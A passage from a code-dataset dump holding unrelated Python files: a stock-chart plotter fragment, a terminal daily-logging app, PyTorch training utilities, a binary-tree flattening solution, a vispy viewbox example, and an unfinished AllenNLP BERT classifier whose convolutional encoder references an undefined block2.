ax.set_ylabel(\"Price\", fontsize=14,labelpad = 10)\n ax.set_xlabel(\"Volume (millions)\", fontsize=14,labelpad = 10)\n plt.locator_params(axis='x',nbins=4)\n ax.grid(True, alpha=0.3)\n \n \n # add 
annotations\n    for j, bar in enumerate(bars.get_children()):\n        popup=str('<table>\\\n<tr><th>Week #%d</th><th></th></tr>\\\n<tr><td>Start</td><td>%s</td></tr>\\\n<tr><td>End</td><td>%s</td></tr>\\\n<tr><td>High</td><td>%.2f</td></tr>\\\n<tr><td>Low</td><td>%.2f</td></tr>\\\n<tr><td>Close</td><td>%.2f</td></tr>\\\n<tr><td>Volume</td><td>%s</td></tr>\\\n</table>
' % (j+1,\n weeks.loc[j+1][6].strftime('%Y-%m-%d'),\n weeks.loc[j+1][7].strftime('%Y-%m-%d'),\n weeks.loc[j+1][0],\n weeks.loc[j+1][1],\n weeks.loc[j+1][4],\n \"{:,}\".format(weeks.loc[j+1][2])))\n tooltip = LineHTMLTooltip(bar, label=popup, css=css)\n plugins.connect(fig, tooltip)\n plugins.connect(fig, plugins.MousePosition(fontsize=14))\n display(mpld3.display())\n\ndef on_markup(b):\n markup_warning.value = ''\n global marks\n startval = int(markup_start.value)\n endval = int(markup_end.value)\n if startval < 0 or startval > len(weeks):\n markup_warning.value = \"Point 1 out of range\"\n return\n if endval < 0 or endval > len(weeks):\n markup_warning.value = \"Point 2 out of range\"\n return\n marks = []\n marks.append([int(markup_start.value), int(markup_end.value)])\n draw_graph()\n\ndef on_line(b):\n line_warning.value = ''\n global lines\n startval = int(line_start.value)\n endval = int(line_end.value)\n if startval < 0 or startval > len(weeks):\n line_warning.value = \"Point 1 out of range\"\n return\n if endval < 0 or endval > len(weeks):\n line_warning.value = \"Point 2 out of range\"\n return\n lines.append([int(startval), line_hilo.value, int(endval)])\n draw_graph()\n line_start.value = ''\n line_end.value = ''\n line_hilo.value = 'High'\n \ndef on_go(b):\n global marks, lines\n marks = []\n lines = []\n markup_start.value=''\n markup_end.value=''\n if not get_data() == False:\n draw_graph()\n \ndef on_today(b):\n if today.value == True:\n end_in.value = datetime.today().strftime('%Y-%m-%d')\n else:\n end_in.value = 'YYYY-MM-DD'\n\ndef on_other(b):\n if ticker_dropdown.value == 'Other':\n ticker_in.visible = True\n else:\n ticker_in.visible = False\n\nticker_dropdown.on_trait_change(on_other)\ntoday.on_trait_change(on_today)\ngo.on_click(on_go)\nmarkup_draw.on_click(on_markup)\nline_button.on_click(on_line)\n","sub_path":"stockgraph.py","file_name":"stockgraph.py","file_ext":"py","file_size_in_byte":12917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"122390520","text":"import os\nimport sys\nimport time\nimport datetime\n\nfrom trackable import Trackable\nfrom validator import Validator\nfrom time_manager import TimeManager, WEEKDAYS\nfrom log_manager import LogManager, LOG_FILE\n\nos.chdir(os.path.dirname(os.path.abspath(__file__))) # To locate *.json files\nlog_mgr = LogManager()\ntime_mgr = TimeManager()\nvalidator = Validator()\n\n\ndef clear():\n if os.name == 'nt':\n _ = os.system('cls')\n else:\n _ = os.system('clear && printf \"\\e[3J\"')\n\n\ndef home_view():\n while 1:\n missed_days = time_mgr.get_all_missed_days(log_mgr)\n clear()\n print(\"Daily Logger v.2.1\\n\")\n if len(missed_days) > 0:\n print(\" Dear user, your log is inconsistent.\")\n print(\" Press Enter to fill the gaps!\\n\")\n print(\" Or pick one of the options below:\")\n else:\n print(\" Welcome back, dear user! Your log is up to date! Good job!\\n\")\n print(\" m > log specfic date\")\n print(\" n > create new trackable\")\n print(\" d > delete existing trackable\")\n print(\" l > list all trackables\")\n # print(\" e > edit existing trackable\") # Coming soon... 
maybe?\n # print(\" a > show analytics\")\n print(\" s > show log\")\n print(\" q > exit\\n\")\n inp = input(\">>> \").strip().lower()\n if inp == \"\" and len(missed_days) > 0:\n missed_days_view(missed_days)\n elif inp == \"m\":\n log_mgr_menu_view()\n elif inp == \"n\":\n creation_view()\n elif inp == \"d\":\n deletion_view()\n elif inp == \"e\":\n edit_view()\n elif inp == \"l\":\n list_view()\n elif inp == \"s\":\n show_log_view()\n # elif inp == \"a\":\n # analytcs_view()\n elif inp == \"q\":\n clear()\n sys.exit()\n else:\n pass\n\n\ndef missed_days_view(missed_days):\n while 1:\n clear()\n print(\"Daily Logger v.2.1\\n\")\n if len(missed_days) == 0:\n print(\" Your log is up to date!\")\n elif len(missed_days) > 1:\n print(\" You didn't log these days:\\n\")\n else:\n print(\" One day to log:\\n\")\n for day in missed_days:\n print(\" - {}, {}\".format(day, WEEKDAYS[datetime.datetime.strptime(day, \"%Y-%m-%d\").weekday()]))\n inp = input(\"\\nContinue? [yes]: \").lower()\n if inp == \"\" or inp.lower() in validator.truths:\n for day in missed_days:\n log_mgr_confirmation_view(day)\n clear()\n break\n else:\n clear()\n break\n\n\ndef log_mgr_menu_view():\n while 1:\n tday = time_mgr.today()\n clear()\n print(\"Logger Menu\\n\")\n print(\" Enter > log the passed day ({})\".format(tday))\n print(\" YYMMDD > log a particular date\")\n print(\" num > 2-digit-max timedelta between today and some point in past\")\n print(\" h > go back home\")\n print(\" q > quit\\n\")\n inp = input(\"Specify the day: \").strip().lower()\n day = None\n if inp == \"\":\n day = tday\n elif inp == \"h\":\n break\n elif inp == \"q\":\n clear()\n sys.exit()\n elif len(inp) >= 6:\n day = time_mgr.get_specific_date(inp)\n elif len(inp) <= 2:\n for i in inp:\n if not i.isdigit():\n break\n else:\n day = time_mgr.n_days_ago(inp)\n if day:\n log_mgr_confirmation_view(day)\n break\n\n\ndef log_mgr_confirmation_view(day):\n while 1:\n clear()\n print(\"\\n You're about to log {}, {}\".format(day,\n WEEKDAYS[datetime.datetime.strptime(day, \"%Y-%m-%d\").weekday()]))\n inp = input(\"\\nGoing on? 
[yes]: \").strip().lower()\n if inp == \"\":\n log_mgr_user_input_view(day)\n break\n else:\n break\n\n\ndef log_mgr_user_input_view(day):\n entry = {day: {}}\n for t in log_mgr.get_trackables():\n if not time_mgr.check_date(day, t):\n continue\n valid = False\n while not valid:\n clear()\n print(\"You are logging {}\\n\".format(day))\n answer = input(\" \" + t.question + \" \")\n valid = validator.validate_answer_type(answer, t)\n if valid:\n valid = validator.validate_range(answer, t.low, t.high)\n answer = validator.process_answer(answer, t)\n entry[day][t.name] = t.get_answer_type()(answer)\n log_mgr.log_day(entry)\n clear()\n print(day, \"successfuly logged!\")\n time.sleep(2)\n clear()\n\n\ndef show_log_view():\n clear()\n print(\"Your log:\")\n with open(LOG_FILE, \"r\") as f:\n for line in f:\n print(line, end=\"\")\n input(\"\\n\\nPress Enter\")\n\n\ndef creation_view():\n valid = False\n while not valid:\n clear()\n n = input(\"Creating new trackable\\n\\n Enter trackable's name: \")\n valid = validator.validate_name(n, log_mgr.get_trackables())\n valid = False\n while not valid:\n clear()\n q = input(\"Creating new trackable\\n\\n Enter the question you want to be asked: \").strip()\n valid = validator.validate_question(q)\n valid = False\n while not valid:\n clear()\n t = input(\n \"Creating new trackable\\n\\n Enter the answer type (str/bool/int/float) (default str): \").strip().lower()\n valid = validator.validate_input_type(t)\n l, h = None, None\n if t == \"int\" or t == \"float\":\n clear()\n l = int(float(input(\"Creating new trackable\\n\\n Enter lower bound (int): \")))\n clear()\n h = int(float(input(\"Creating new trackable\\n\\n Enter upper bound (int, inclusive): \")))\n clear()\n p = input(\"Creating new trackable\\n\\n How frequently the trackable should be tracked? (default: every day): \")\n clear()\n if t == \"\":\n t = \"str\"\n if p == \"\":\n p = \"W1111111\"\n if q[-1] != \"?\":\n q += \"?\"\n q = q.capitalize()\n log_mgr.create_trackable(n, q, t, l, h, p)\n clear()\n print(\"\\n New trackable created!\")\n time.sleep(1)\n\n\ndef list_view():\n clear()\n trackables = log_mgr.get_trackables()\n if len(trackables) == 0:\n print(\"\\n You have nothing to track yet\\n\")\n else:\n print(\"Your trackables:\\n\")\n for t in trackables:\n print(\" - {}\".format(t.get_beautiful_name()))\n print(\" question: {}\".format(t.question))\n print(\" type: {}\".format(t.answer_type))\n if t.low is not None:\n print(\" lower: {}\".format(t.low))\n print(\" upper: {}\".format(t.high))\n print(\" period: {}\\n\".format(t.period))\n print(\" {} trackables at all\\n\".format(len(trackables)))\n input(\"Press Enter\")\n\n\ndef deletion_view():\n clear()\n trackables = log_mgr.get_trackables()\n d = {i + 1: t for i, t in enumerate(trackables)}\n print(\"Deletion Menu\\n\")\n for i in range(1, len(trackables) + 1):\n print(\" {} - {}\".format(i, d[i].get_beautiful_name()))\n code = input(\"\\nEnter code to delete trackable \\nType anything else to abort: \")\n try:\n if int(code) in d:\n deletion_confirmation_view(d[int(code)])\n except:\n pass\n\n\ndef deletion_confirmation_view(trackable):\n clear()\n print(\"\\n\\nWARNING!\\n You are about to delete '{}' trackable.\".format(trackable.get_beautiful_name()))\n inp = input(\" Are you sure you want to proceed (y/n)? 
\")\n if inp == \"y\" or inp == \"Y\" or inp == \"\":\n log_mgr.delete_trackable(trackable)\n clear()\n print(\"\\n Trackable '{}' is deleted\".format(trackable.get_beautiful_name()))\n time.sleep(1.5)\n else:\n clear()\n print(\"\\n\\n No changes made\")\n time.sleep(1.5)\n\n\ndef edit_view(): # To edit trackables' names, questions, ranges, and periods\n pass # We don't edit ans_type because it would affect log consistency\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"264251040","text":"import os\nimport torch\nimport torch.nn.functional as F\nimport time\nimport numpy as np\nfrom training.load_data import get_batch\nimport torch.utils.data as Data\nfrom tensorboardX import SummaryWriter\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nfrom sklearn.metrics import confusion_matrix, precision_score, accuracy_score, recall_score, f1_score\n\ndef cal_performance(pred, gold, smoothing=False):\n ''' Apply label smoothing if needed '''\n\n loss = cal_loss(pred, gold, smoothing)\n\n return loss\n\ndef cal_loss(pred, gold, smoothing):\n ''' Calculate cross entropy loss, apply label smoothing if needed. '''\n\n gold = gold.contiguous().view(-1)\n\n if smoothing:\n eps = 0.1\n n_class = pred.size(1)\n\n one_hot = torch.zeros_like(pred).scatter(1, gold.view(-1, 1), 1)\n one_hot = one_hot * (1 - eps) + (1 - one_hot) * eps / (n_class - 1)\n log_prb = F.log_softmax(pred, dim=1)\n\n loss = -(one_hot * log_prb).sum(dim=1)\n loss = loss.sum() # average later\n else:\n loss = F.cross_entropy(pred, gold, reduction='sum')\n\n return loss\n\ndef train_epoch(model, training_data, optimizer, device, smoothing):\n ''' Epoch operation in training phase'''\n\n model.train()\n\n total_loss = 0\n n_count = 0\n prediction = []\n label = []\n\n for step, (eod, gt) in enumerate(training_data):\n\n # prepare data\n Eod, Gt = eod.to(device), gt.to(device)\n\n # forward\n optimizer.zero_grad()\n pred = model(Eod)\n\n # backward\n loss = cal_performance(pred, Gt, smoothing=smoothing)\n loss.backward()\n\n # update parameters\n optimizer.step_and_update_lr()\n # optimizer.step()\n\n # note keeping\n total_loss += loss.item()\n n_count += Eod.size(0) * Eod.size(1)\n\n pred = pred.max(1)[1]\n gold = Gt.contiguous().view(-1)\n\n pred = np.array(pred.cpu())\n gold = np.array(gold.cpu())\n\n length = len(pred)\n for i in range(length):\n prediction.append(pred[i])\n label.append(gold[i])\n\n epoch_loss = total_loss / n_count\n accuracy = 100 * accuracy_score(label, prediction)\n precision = 100 * precision_score(label, prediction, average='macro')\n recall = 100 * recall_score(label, prediction, average='macro')\n f1 = 100 * f1_score(label, prediction, average='macro')\n\n return epoch_loss, accuracy, precision, recall, f1\n\ndef eval_epoch(model, validation_data, device):\n ''' Epoch operation in evaluation phase '''\n\n model.eval()\n\n total_loss = 0\n n_count = 0\n prediction = []\n label = []\n\n with torch.no_grad():\n for step, (eod, gt) in enumerate(validation_data):\n\n # prepare data\n Eod, Gt = eod.to(device), gt.to(device)\n\n # forward\n pred = model(Eod)\n loss = cal_performance(pred, Gt, smoothing=False)\n\n # note keeping\n total_loss += loss.item()\n n_count += Eod.size(0) * Eod.size(1)\n\n pred = pred.max(1)[1]\n gold = Gt.contiguous().view(-1)\n\n pred = np.array(pred.cpu())\n gold = np.array(gold.cpu())\n\n length = len(pred)\n for i in range(length):\n 
prediction.append(pred[i])\n label.append(gold[i])\n\n epoch_loss = total_loss / n_count\n accuracy = 100 * accuracy_score(label, prediction)\n precision = 100 * precision_score(label, prediction, average='macro')\n recall = 100 * recall_score(label, prediction, average='macro')\n f1 = 100 * f1_score(label, prediction, average='macro')\n\n return epoch_loss, accuracy, precision, recall, f1\n\n\ndef train(model, training_data, validation_data, optimizer, device, args):\n ''' Start training '''\n\n log_train_file = None\n log_valid_file = None\n\n if args.log:\n log_train_file = args.log + '.train.log'\n log_valid_file = args.log + '.valid.log'\n\n print('[Info] Training performance will be written to file: {} and {}'.format(\n log_train_file, log_valid_file))\n\n with open(log_train_file, 'w') as log_tf, open(log_valid_file, 'w') as log_vf:\n log_tf.write('epoch, loss, accuracy, precision, recall, f1\\n')\n log_vf.write('epoch, loss, accuracy, precision, recall, f1\\n')\n\n writer = SummaryWriter(comment=args.log[7:])\n\n valid_accus = []\n for epoch_i in range(args.epoch):\n print('[ Epoch', epoch_i, ']')\n\n start = time.time()\n train_loss, train_accu, train_mp, train_mr, train_f1 = train_epoch(\n model, training_data, optimizer, device, smoothing=args.label_smoothing)\n print(' - (Training) loss: {loss: 8.5f}, accuracy: {accu:3.2f} %, '\n 'precision: {mp: 3.2f} %, recall: {mr: 3.2f} %, f1: {f1: 3.2f} % ' \\\n 'elapse: {elapse:3.3f} min'.format(\n loss=train_loss, accu=train_accu, mp=train_mp, mr=train_mr, f1=train_f1,\n elapse=(time.time() - start) / 60))\n\n writer.add_scalar('scalar/loss_train', train_loss, epoch_i + 1)\n writer.add_scalar('scalar/acc_train', train_accu, epoch_i + 1)\n writer.add_scalar('scalar/mp_train', train_mp, epoch_i + 1)\n writer.add_scalar('scalar/mr_train', train_mr, epoch_i + 1)\n writer.add_scalar('scalar/f1_train', train_f1, epoch_i + 1)\n\n\n start = time.time()\n valid_loss, valid_accu, valid_mp, valid_mr, valid_f1 = eval_epoch(model, validation_data, device)\n print(' - (validation) loss: {loss: 8.5f}, accuracy: {accu:3.2f} %, '\n 'precision: {mp: 3.2f} %, recall: {mr: 3.2f} %, f1: {f1: 3.2f} % ' \\\n 'elapse: {elapse:3.3f} min'.format(\n loss=valid_loss, accu=valid_accu, mp=valid_mp, mr=valid_mr, f1=valid_f1,\n elapse=(time.time() - start) / 60))\n\n writer.add_scalar('scalar/loss_valid', valid_loss, epoch_i + 1)\n writer.add_scalar('scalar/acc_valid', valid_accu, epoch_i + 1)\n writer.add_scalar('scalar/mp_valid', valid_mp, epoch_i + 1)\n writer.add_scalar('scalar/mr_valid', valid_mr, epoch_i + 1)\n writer.add_scalar('scalar/f1_valid', valid_f1, epoch_i + 1)\n\n valid_accus += [valid_accu]\n\n model_state_dict = model.state_dict()\n checkpoint = {\n 'model': model_state_dict,\n 'settings': args,\n 'epoch': epoch_i}\n\n if args.save_model:\n if args.save_mode == 'all':\n model_name = args.save_model + '_accu_{accu:3.2f}.chkpt'.format(accu=valid_accu)\n torch.save(checkpoint, model_name)\n elif args.save_mode == 'best':\n model_name = args.save_model + '.chkpt'\n if valid_accu >= max(valid_accus):\n torch.save(checkpoint, model_name)\n print(' - [Info] The checkpoint file has been updated.')\n\n if log_train_file and log_valid_file:\n with open(log_train_file, 'a') as log_tf, open(log_valid_file, 'a') as log_vf:\n log_tf.write('{epoch: 4.0f},{loss: 8.5f},{accu: 3.2f},{mp: 3.2f},{mr: 3.2f},{f1: 3.2f}\\n'.format(\n epoch=epoch_i, loss=train_loss, accu=train_accu, mp=train_mp, mr=train_mr, f1=train_f1))\n log_vf.write('{epoch: 4.0f},{loss: 8.5f},{accu: 
3.2f},{mp: 3.2f},{mr: 3.2f},{f1: 3.2f}\\n'.format(\n epoch=epoch_i, loss=valid_loss, accu=valid_accu, mp=valid_mp, mr=valid_mr, f1=valid_f1))\n\n writer.close()\n\n if log_valid_file:\n with open(log_valid_file, 'a') as log_vf:\n log_vf.write('{Best:3.2f}\\n'.format(Best=max(valid_accus)))\n\ndef prepare_dataloaders(eod_data, gt_data, args):\n # ========= Preparing DataLoader =========#\n EOD, GT = [], []\n for i in range(eod_data.shape[1] - args.length - 1):\n eod, gt = get_batch(eod_data, gt_data, i, args.length)\n EOD.append(eod)\n GT.append(gt)\n\n train_eod, train_gt = EOD[:args.train_index], GT[:args.train_index]\n valid_eod, valid_gt = EOD[args.train_index:], GT[args.train_index:]\n\n # ========= debug =========#\n # train1, train2, train3 = 0,0,0\n # test1, test2, test3 = 0,0,0\n # for i in train_gt:\n # for j in i:\n # if j==0:\n # train1+=1\n # elif j==1:\n # train2+=1\n # else:\n # train3+=1\n #\n # for i in valid_gt:\n # for j in i:\n # if j==0:\n # test1+=1\n # elif j==1:\n # test2+=1\n # else:\n # test3+=1\n #\n # trains = train1+train2+train3\n # tests = test1+test2+test3\n # print(train1/trains, train2/trains, train3/trains)\n # print(test1/tests, test2/tests, test3/tests)\n # exit()\n\n train_eod, valid_eod = torch.FloatTensor(train_eod), torch.FloatTensor(valid_eod)\n train_gt, valid_gt = torch.LongTensor(train_gt), torch.LongTensor(valid_gt)\n\n print(train_eod.shape, valid_eod.shape)\n print(train_gt.shape, valid_gt.shape)\n\n train_dataset = Data.TensorDataset(train_eod, train_gt)\n valid_dataset = Data.TensorDataset(valid_eod, valid_gt)\n\n train_loader = Data.DataLoader(dataset=train_dataset, batch_size=args.batch_size, shuffle=True)\n valid_loader = Data.DataLoader(dataset=valid_dataset, batch_size=args.batch_size)\n\n return train_loader, valid_loader\n\ndef prepare_dataloaders_(eod_data, gt_data, args):\n # ========= Preparing DataLoader =========#\n EOD, GT = [], []\n for i in range(eod_data.shape[1] - args.length - args.steps - 1):\n eod, gt = get_batch(eod_data, gt_data, i, args.length)\n EOD.append(eod)\n GT.append(gt)\n\n train_eod, train_gt = EOD[:args.train_index], GT[:args.train_index]\n valid_eod, valid_gt = EOD[args.train_index:], GT[args.train_index:]\n\n # ========= debug =========#\n # train1, train2, train3 = 0,0,0\n # test1, test2, test3 = 0,0,0\n # for i in train_gt:\n # for j in i:\n # if j==0:\n # train1+=1\n # elif j==1:\n # train2+=1\n # else:\n # train3+=1\n #\n # for i in valid_gt:\n # for j in i:\n # if j==0:\n # test1+=1\n # elif j==1:\n # test2+=1\n # else:\n # test3+=1\n #\n # trains = train1+train2+train3\n # tests = test1+test2+test3\n # print(train1/trains, train2/trains, train3/trains)\n # print(test1/tests, test2/tests, test3/tests)\n # exit()\n\n train_eod, valid_eod = torch.FloatTensor(train_eod), torch.FloatTensor(valid_eod)\n train_gt, valid_gt = torch.LongTensor(train_gt), torch.LongTensor(valid_gt)\n\n print(train_eod.shape, valid_eod.shape)\n print(train_gt.shape, valid_gt.shape)\n\n train_dataset = Data.TensorDataset(train_eod, train_gt)\n valid_dataset = Data.TensorDataset(valid_eod, valid_gt)\n\n train_loader = Data.DataLoader(dataset=train_dataset, batch_size=args.batch_size, shuffle=True)\n valid_loader = Data.DataLoader(dataset=valid_dataset, batch_size=args.batch_size)\n\n return train_loader, valid_loader","sub_path":"training/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":11125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
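The `cal_loss` helper in `training/tool.py` above builds a smoothed one-hot target before summing the negative log-likelihood. A minimal standalone sketch of that computation - same `eps = 0.1` and the same scatter/softmax steps as the code, but with made-up toy tensors - looks like this:

```python
import torch
import torch.nn.functional as F

# Toy logits for 2 samples over 3 classes (made-up numbers, not from the dataset).
pred = torch.tensor([[2.0, 0.5, 0.1],
                     [0.2, 1.5, 0.3]])
gold = torch.tensor([0, 1])   # true class indices

eps = 0.1                     # smoothing factor used by cal_loss above
n_class = pred.size(1)

# One-hot targets, softened: the true class keeps 1 - eps and the remaining
# eps mass is spread evenly over the other n_class - 1 classes.
one_hot = torch.zeros_like(pred).scatter(1, gold.view(-1, 1), 1)
one_hot = one_hot * (1 - eps) + (1 - one_hot) * eps / (n_class - 1)

log_prb = F.log_softmax(pred, dim=1)
loss = -(one_hot * log_prb).sum(dim=1).sum()  # summed here; the caller normalizes
print(float(loss))
```

The division by `n_count` happens afterwards in `train_epoch`/`eval_epoch`, which is why `cal_loss` returns a sum rather than a mean.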
+{"seq_id":"548623568","text":"class Solution(object):\n def flatten(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n res = []\n if not root: return root\n self.preorder(root, res)\n cur = head = res[0]\n for i in range(1, len(res)):\n cur.left = None\n cur.right = res[i]\n cur = res[i]\n\n def preorder(self, root, res):\n cur = root\n res.append(cur)\n if cur.left: self.preorder(cur.left, res)\n if cur.right: self.preorder(cur.right, res)","sub_path":"100-200/114_flatten_bin_tree_to_list.py","file_name":"114_flatten_bin_tree_to_list.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"598365365","text":"\"\"\"\nSimple test of stacking viewboxes, demonstrating the three methods that\ncan be used by a viewbox to provide clipping.\n\nThere is one root scene with an NDC camera. It contains two viewboxes.\nOne with an NDC camera on the left, and one with a pixel camera on the\nright. Each of these viewboxes contains again two viewboxes. One with\nndc camera at the bottom, and one with a pixel camera at the top.\n\nUse the global PREFER_PIXEL_GRID variables to set the clipping method\nfor the two toplevel and four leaf viewbox, respectively. You can also\nmanyally set the preferred_clip_method property of one or more viewboxes.\n\nThis is what it should look like:\n\nThe line in pixel coordinates is normally expected to have the marker\nup (since the y-axis points down). The line in 2D unit coordinates is\nnormally expected to have the marker down (since the y-axis is up). But\npositioning a Viewbox is a UnitCamera2 will make it upside down.\n\n vb1 uses NormalCamera vb2 uses PixelCamera\n so contents are upside-down so contents are correct\n_______________________________________________________________\n| | |\n| long line with marker down | short line with marker down |\n|_______________________________|_______________________________|\n| | |\n| short line with marker up | long line with marker up |\n|_______________________________|_______________________________|\n\n\"\"\"\n\nimport numpy as np\n\nfrom vispy import app\nfrom vispy import scene\n\n#gloo.gl.use('desktop debug')\n\n# <<< Change method here\n# With the none method you can see the absence of clipping.\n# With the fbo method you can see the texture interpolation (induced by\n# a delibirate mismatch in screen and textue resolution)\n# Try different combinarions, like a viewport in an fbo\nPREFER_PIXEL_GRID1 = 'viewport' # none, viewport, fbo (fragment to come)\nPREFER_PIXEL_GRID2 = 'fbo'\n\n\n# Create lines for use in ndc and pixel coordinates\nN = 1000\ncolor = np.ones((N, 4), dtype=np.float32)\ncolor[:, 0] = np.linspace(0, 1, N)\ncolor[:, 1] = color[::-1, 0]\npos = np.empty((N, 2), np.float32)\n#\npos[:, 0] = np.linspace(-1., 1., N)\npos[:, 1] = np.random.normal(0.0, 0.5, size=N)\npos[:20, 1] = -0.5 # So we can see which side is down\nline_ndc = scene.visuals.Line(pos=pos.copy(), color=color)\n#\npos[:, 0] = np.linspace(50, 350., N)\npos[:, 1] = 150 + pos[:, 1] * 50\npos[:20, 1] = 100 # So we can see which side is down\nline_pixels = scene.visuals.Line(pos=pos.copy(), color=color)\n\n# Create canvas\ncanvas = scene.SceneCanvas(size=(800, 600), show=True, close_keys='escape')\ncanvas.scene.camera = scene.cameras.PixelCamera()\n\n# Create viewboxes left ...\n\nw, h = canvas.size\nw2 = w / 2.\nh2 = h / 2.\n\nvb1 = scene.ViewBox(canvas.scene, name='vb1', margin=2, 
border=(1, 0, 0, 1))\nvb1.pos = 0, 0\nvb1.size = w2, h\nvb1.scene.camera = scene.cameras.Fixed2DCamera(fovx=(-1, 1))\n#\nvb11 = scene.ViewBox(vb1.scene, name='vb11', margin=0.02, border=(0, 1, 0, 1))\nvb11.pos = -1.0, -1.0\nvb11.size = 2.0, 1.0\nvb11.scene.camera = scene.cameras.TwoDCamera()\nvb11.scene.camera.transform.scale = (2., 2.)\n#\nvb12 = scene.ViewBox(vb1.scene, name='vb12', margin=0.02, border=(0, 0, 1, 1))\nvb12.pos = -1.0, 0.0\nvb12.size = 2.0, 1.0\nvb12.scene.camera = scene.cameras.PixelCamera()\n#vb12.scene.camera.scale = (100, 100)\n#\nline_ndc.add_parent(vb11.scene)\nline_pixels.add_parent(vb12.scene)\n\nbox = np.array([[0, 0], [0, 1], [1, 1], [1, 0], [0, 0]], dtype=np.float32)\nunit_box = scene.visuals.Line(pos=box, color=(1, 0, 0, 1), name='unit box')\nnd_box = scene.visuals.Line(pos=box*2-1, color=(0, 1, 0, 1), name='nd box')\nvb11.add(unit_box)\nvb11.add(nd_box)\n\n# Create viewboxes right ...\n\nvb2 = scene.ViewBox(canvas.scene, name='vb2', margin=2, border=(1, 1, 0, 1))\nvb2.pos = w2, 0\nvb2.size = w2, h\nvb2.scene.camera = scene.cameras.PixelCamera()\n#\nvb21 = scene.ViewBox(vb2.scene, name='vb21', margin=10, border=(1, 0, 1, 1))\nvb21.pos = 0, 0\nvb21.size = 400, 300\nvb21.scene.camera = scene.cameras.TwoDCamera()\nvb21.scene.camera.transform.scale = (2., 2.)\n#\nvb22 = scene.ViewBox(vb2.scene, name='vb22', margin=10, border=(0, 1, 1, 1))\nvb22.pos = 0, 300\nvb22.size = 400, 300\nvb22.scene.camera = scene.cameras.PixelCamera()\n#\nline_ndc.add_parent(vb21.scene)\nline_pixels.add_parent(vb22.scene)\n\n# Set preferred pixel grid method\nfor vb in [vb1, vb2]:\n vb.preferred_clip_method = PREFER_PIXEL_GRID1\nfor vb in [vb11, vb12, vb21, vb22]:\n vb.preferred_clip_method = PREFER_PIXEL_GRID2\n\n\n# For testing/dev\nvb1._name = 'vb1'\nvb11._name = 'vb11'\nvb12._name = 'vb12'\nvb2._name = 'vb2'\nvb21._name = 'vb21'\nvb22._name = 'vb22'\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"examples/scene/viewbox.py","file_name":"viewbox.py","file_ext":"py","file_size_in_byte":4718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"146149179","text":"from typing import Dict, Optional\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\n\nfrom overrides import overrides\nfrom allennlp.models import Model\nfrom allennlp.nn.util import get_text_field_mask\nfrom allennlp.training.metrics import CategoricalAccuracy\nfrom allennlp.modules.seq2vec_encoders import Seq2VecEncoder\nfrom allennlp.modules.text_field_embedders import TextFieldEmbedder\n\n\nclass BertSentencePooler(Seq2VecEncoder):\n\n def __init__(self, vocab, embedding_dim):\n super().__init__()\n self.vocab = vocab\n self.embedding_dim = embedding_dim\n\n\n def forward(self, embs, mask=None):\n # extract first token tensor\n return embs[:, 0]\n \n @overrides\n def get_output_dim(self) -> int:\n return self.embedding_dim \n\n\nclass Conv2dEncoderConfig:\n # Block0\n in_channels0 = 1\n out_channels0 = 100\n kernel_size0 = 3\n pool_size0 = 100\n # Block1\n in_channels1 = 100\n out_channels1 = 100\n kernel_size1 = 4\n pool_size1 = 100\n # Block2\n in_channels2 = 100\n out_channels2 = 1\n kernel_size2 = 5\n pool_size2 = 10\n\n\nclass ConvBlock(nn.Sequential):\n\n def __init__(self, in_channels, out_channels, kernel_size, pool_size, dropout=0.2):\n super(ConvBlock, self).__init__()\n self.add_module('conv2d', nn.Conv2d(in_channels, out_channels, kernel_size))\n self.add_module('relu', nn.ReLU(inplace=True))\n 
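        # nn.AdaptiveMaxPool2d(pool_size) below pools the feature map down to a
        # fixed pool_size x pool_size output regardless of the input H/W, so with
        # pool_size0 = 100 a (N, 1, H, W) input leaves block0 as (N, 100, 100, 100).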
self.add_module('adaptive_maxpool', nn.AdaptiveMaxPool2d(pool_size))\n self.add_module('dropout', nn.Dropout(p=dropout))\n\n def forward(self, x):\n return super(ConvBlock, self).forward(x)\n\n\nclass Conv2dEncoder(Seq2VecEncoder):\n\n def __init__(self, config=Conv2dEncoderConfig()):\n super().__init__()\n self.conf = config\n self.block0 = ConvBlock(\n self.conf.in_channels0, \n self.conf.out_channels0, \n self.conf.kernel_size0, \n self.conf.pool_size0\n )\n self.block1 = ConvBlock(\n self.conf.in_channels1, \n self.conf.out_channels1, \n self.conf.kernel_size1, \n self.conf.pool_size1\n )\n self.block1 = ConvBlock(\n self.conf.in_channels2, \n self.conf.out_channels2, \n self.conf.kernel_size2, \n self.conf.pool_size2\n )\n\n def forward(self, x):\n print_shape('x input encoder', x)\n x = self.block0(x)\n print_shape('block 0 out', x)\n x = self.block1(x)\n print_shape('block 1 out', x)\n x = self.block2(x)\n return x\n\n @overrides\n def get_output_dim(self) -> int:\n return self.conf.pool_size2**2 \n\n\nclass BertModel2D(Model):\n\n def __init__(self, word_embeddings, vocab, bertpooler, encoder, n_classes):\n super().__init__(vocab)\n self.word_embeddings = word_embeddings\n self.bertpooler = bertpooler\n self.encoder = encoder \n self.projection = nn.Linear(self.encoder.get_output_dim(), n_classes)\n self.criterion = nn.CrossEntropyLoss()\n self.accuracy = CategoricalAccuracy()\n\n def forward(self, tokens, id, label):\n mask = get_text_field_mask(tokens)\n embeddings = self.word_embeddings(tokens)\n state = self.bertpooler(embeddings, mask)\n print_shape('state prior', state) \n state = torch.unsqueeze(state, 1)\n print_shape('shape post', state)\n features = self.encoder(state)\n features = features.view(features.size(0), -1)\n logits = self.projection(features)\n output = {\"class_logits\": logits}\n\n if label is not None:\n self.accuracy(logits, label)\n output[\"loss\"] = self.criterion(logits, label.long())\n\n return output\n\n def get_metrics(self, reset=False):\n return {\"accuracy\": 